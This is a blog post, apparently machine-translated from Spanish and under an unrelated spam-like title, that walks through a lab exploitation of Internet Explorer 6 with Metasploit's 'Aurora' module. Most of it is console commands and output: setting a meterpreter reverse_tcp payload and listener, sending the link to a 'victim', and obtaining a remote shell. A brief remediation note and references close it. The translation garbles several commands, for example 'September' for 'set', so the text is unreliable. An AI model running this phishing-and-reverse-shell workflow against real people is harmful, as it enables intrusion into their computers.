Tuesday, February 9, 2010

Where To Find White Tredsafes

Laboratory - Metasploit - Phishing Exploit


Well I think everyone should know the 0 day is so much talk in recent times on IE, which achieved a BOF can inject arbitrary code by obtaining a shell, but not all are vulnerable is a little board that shows how well are standing some versions of windows together with the version of IE, but now knowing that it detected the virus ..


Image
http://elladodelmal.blogspot.com/


The laboratory is composed of a Virtual Machine (VirtualBox, in the next post I will explain how to install it with yapa Hacking!) having azap installed a Windows XP SP3 with Internet Explorer version 6.0, which is completely vulnerable. Luckily it is very rare to find customers browsing with that version, but .... :). Je ..

Starting nesesitas the metasploit first time, we can download from here , search for linux architecture is 32-bit and 64 bit (I download this
framework-3.3.3 linux-x86_6
4.run ), is also for windows but the last one did not have the exploit lower aurora, but can be added by downloading the expanse rb file and place it in the folder exploit / windows / browser that would be ideal. Here
the exploit. Once installed the metasploit, and everything has gone well (in linux nesesitas intalar ruby), go to metasploit console.
/ home / user # msfconsole


_ _ _ + - --= [320 exploits - 99 auxiliary + - --= [217 payloads - 20 encoders - 6 nops = [svn r8438 updated yesterday (2010.02.09) msf>

Once
within the Metasploit console, we have to choose the exploit to use


msf> use windows
/ browser / ie_aurora

msf exploit (
ie_aurora
)>
show options Module options:

Name Current Setting Required Description ---- --------------- -------- -----------

yes SRVHOST 0.0.0.0 The
local host to listen on. SRVPORT
8080 yes The local port to listen on.
not Negotiate SSL false SSL for incoming connections SSLVersion
SSL3 not Specify the version of SSL That Should Be used (Accepted: SSL2, SSL3, TLS1)
URIPATH not The URI to use for this exploit (default is random)
Exploit target:
Id Name - ---- 0 Automatic

Once loaded the exploit to use command, we can see the arguments nesesita the exploit to run the command show options
. payload will use a reverse shell, to put it as follows.


msf exploit ( ie_aurora
)> September PAYLOAD windows / meterpreter / reverse_tcp PAYLOAD => windows / meterpreter / reverse_tcp



Well started to fill the arguments of both the Payload and the EXPLOIT
msf exploit (
ie_aurora
)> September
190.18x.xxx.xxx

Lhoste Lhoste => 190.18x.xx.xxx
msf exploit ( ie_aurora )> September URIPATH /
URIPATH => / msf exploit (
ie_aurora
)> show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST 0.0.0.0 yes The local host to listen on. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL for incoming connections
SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process Exit yes technique: seh, thread, process
Lhoste 190.18x.xx.xxx yes The local address lport 
 yes The local port 4444 
 
 
 Exploit target: Id Name 
 
 
 - 0 ---- Automatic 
 
 
 
 
 
 The screen looks like it loaded Lhoste setearon values \u200b\u200bwould come to be the ip of the attacker. Largo 
 exploit
msf exploit (
ie_aurora
)>

exploit [*] Exploit running as background job.
msf exploit (
 ie_aurora )>  [*] Started on reverse handler 190.18x.xx.xxx: 4444 
 [*] Using URL: http://0.0.0.0:8080/  [*] Local IP: http://190.18x.xx.xxx:8080/  [*] Server started.   
 
 
 The server I have it running on the argument Lhoste IP on port 8080 and have a reverse shell on port 4444:). 
 Now send the link to the victim, and we hope to enter. 
 
 
 
 
 
 Let our metasploit console:) 
 
 
 
 
 
 [*] Sending Microsoft Internet Explorer "Aurora" Memory Corruption 190.18x.xx.xxx 
 to client [*] Sending Stage (725,504 bytes) 
 [*] Meterpreter session 1 OPEN (190.18x.xx.xxx: 4444 -> 190.18x.xx.xxx: 51513)
sessions-l
Active sessions =============== Id Description Tunnel
- ----------- ------ 1 Meterpreter 190.18x.xx . xxx: 4444 -> 190.18x.xx.xxx: 51513
msf exploit (
ie_aurora
)> sessions-i 1 
  [*] Starting interaction with 1 ...  meterpreter> sysinfo   
 Computer: VICTIM 
 OS: Windows XP (Build 2600, Service Pack 3). 
 Arch: x86
Language: en_US 




 see that we have the session with the victim, who has a Windows XP SP3.  Now for the remote shell is the best:)      
  
 meterpreter >   shell    Process 812 created.  Channel 1 created. 
 Microsoft Windows XP [Versi�n 5.1.2600] 
 (C) Copyright 1985-2001 Microsoft Corp.    C:\Documents and Settings\Victima 10\Escritorio>  hostname   
 hostname 
 victima 
  
 C:\Documents and Settings\Victima 10\Escritorio> 
  
  
  
  
  
 Solucion 
  
  
 Navegar con un antivirus para este exploit seria lo mejor el NOD32 lo detecta y no deja inyectar, tambien no usar un IE explorer anticuado asi como el 6.x que fue hecho en esta POC. Mientras pasen cosas parecidas dejar de utilizar el software defectuoso hasta Company that owns the patch of the same length for each program there is always another that performs the same action, choosing this temporarlmente. 
 
 
 
 
 
 References: 
 
 http://blog.metasploit.com/2010/01/reproducing-aurora-ie-exploit.html 
 
 
 
 http://foro.elhacker.net/hacking_avanzado/metasploit_0day_ie_exploit_ieaurora "Greetings 
 
 
 t281678.0.html

Posted by admin at 7:30 PM

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)